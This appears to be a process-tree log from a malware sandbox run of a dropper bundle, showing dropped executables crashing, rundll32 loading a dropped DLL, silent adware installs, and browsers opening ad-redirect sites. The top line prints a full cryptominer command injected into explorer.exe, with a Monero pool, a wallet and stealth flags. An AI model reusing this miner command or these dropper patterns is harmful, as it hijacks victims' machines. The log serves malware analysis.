C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth8⤵PID:3276
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1.exe"C:\Users\Admin\AppData\Local\Temp\1.exe"6⤵PID:2996
-
-
C:\Users\Admin\AppData\Local\Temp\2.exe"C:\Users\Admin\AppData\Local\Temp\2.exe"6⤵PID:3068
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"7⤵PID:2668
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"8⤵PID:3076
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\3.exe"C:\Users\Admin\AppData\Local\Temp\3.exe"6⤵PID:2104
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2104 -s 8647⤵
- Loads dropped DLL
- Program crash
PID:1896
-
-
-
C:\Users\Admin\AppData\Local\Temp\4.exe"C:\Users\Admin\AppData\Local\Temp\4.exe"6⤵PID:1584
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1584 -s 8647⤵
- Program crash
PID:3044
-
-
-
C:\Users\Admin\AppData\Local\Temp\5.exe"C:\Users\Admin\AppData\Local\Temp\5.exe"6⤵PID:2000
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2000 -s 8887⤵
- Program crash
PID:2844
-
-
-
C:\Users\Admin\AppData\Local\Temp\6.exe"C:\Users\Admin\AppData\Local\Temp\6.exe"6⤵PID:936
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 936 -s 13687⤵
- Program crash
PID:2216
-
-
-
C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"6⤵PID:2984
-
-
C:\Users\Admin\AppData\Local\Temp\7.exe"C:\Users\Admin\AppData\Local\Temp\7.exe"6⤵PID:1196
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1196 -s 8927⤵
- Executes dropped EXE
- Loads dropped DLL
- Program crash
PID:1464
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri19ca03f05489b.exe4⤵
- Loads dropped DLL
PID:1664 -
C:\Users\Admin\AppData\Local\Temp\7zS4E7BF844\Fri19ca03f05489b.exeFri19ca03f05489b.exe5⤵
- Executes dropped EXE
PID:2152
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri19927b4fe38a9d1.exe4⤵
- Loads dropped DLL
PID:2004
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri19870e2febf5544.exe4⤵
- Loads dropped DLL
PID:1124
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS4E7BF844\Fri19870e2febf5544.exeFri19870e2febf5544.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:288
-
C:\Users\Admin\AppData\Local\Temp\is-3CRBU.tmp\Fri192b9eeaa03b.tmp"C:\Users\Admin\AppData\Local\Temp\is-3CRBU.tmp\Fri192b9eeaa03b.tmp" /SL5="$50158,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS4E7BF844\Fri192b9eeaa03b.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2204 -
C:\Users\Admin\AppData\Local\Temp\is-KFEGJ.tmp\46807GHF____.exe"C:\Users\Admin\AppData\Local\Temp\is-KFEGJ.tmp\46807GHF____.exe" /S /UID=burnerch22⤵
- Executes dropped EXE
PID:2792 -
C:\Program Files\Mozilla Firefox\AIMDNWBPNL\ultramediaburner.exe"C:\Program Files\Mozilla Firefox\AIMDNWBPNL\ultramediaburner.exe" /VERYSILENT3⤵PID:544
-
C:\Users\Admin\AppData\Local\Temp\is-KOP1C.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-KOP1C.tmp\ultramediaburner.tmp" /SL5="$1032E,281924,62464,C:\Program Files\Mozilla Firefox\AIMDNWBPNL\ultramediaburner.exe" /VERYSILENT4⤵PID:2172
-
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu5⤵PID:2320
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7d-7c835-e2a-c739b-0a256fdb40b8e\Sifepupygo.exe"C:\Users\Admin\AppData\Local\Temp\7d-7c835-e2a-c739b-0a256fdb40b8e\Sifepupygo.exe"3⤵PID:2860
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e64⤵PID:3452
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3452 CREDAT:275457 /prefetch:25⤵PID:3632
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3452 CREDAT:2372628 /prefetch:25⤵PID:3008
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3452 CREDAT:2372644 /prefetch:25⤵PID:296
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3452 CREDAT:1979491 /prefetch:25⤵PID:3652
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3452 CREDAT:2110583 /prefetch:25⤵PID:2964
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad4⤵PID:3828
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3828 CREDAT:275457 /prefetch:25⤵PID:2388
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?zoneid=18514834⤵PID:3560
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?zoneid=18515134⤵PID:3024
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://www.directdexchange.com/jump/next.php?r=20872154⤵PID:980
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://www.directdexchange.com/jump/next.php?r=42631194⤵PID:808
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?id=12942314⤵PID:3584
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?zoneid=1492888&var=34⤵PID:3888
-
-
-
C:\Users\Admin\AppData\Local\Temp\69-b8ff1-b5b-7bda5-f26822aa0a6b8\Liraejyhipa.exe"C:\Users\Admin\AppData\Local\Temp\69-b8ff1-b5b-7bda5-f26822aa0a6b8\Liraejyhipa.exe"3⤵PID:2168
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS4E7BF844\Fri19927b4fe38a9d1.exeFri19927b4fe38a9d1.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2188
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:2636 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
PID:2656
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding1⤵PID:2572
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2572 CREDAT:275457 /prefetch:22⤵PID:3284
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {5AE4A19C-65E6-4EC2-B679-6D944EC306CB} S-1-5-21-1669990088-476967504-438132596-1000:KJUCCLUP\Admin:Interactive:[1]1⤵PID:3864
-
C:\Users\Admin\AppData\Roaming\fggtsfvC:\Users\Admin\AppData\Roaming\fggtsfv2⤵PID:3840
-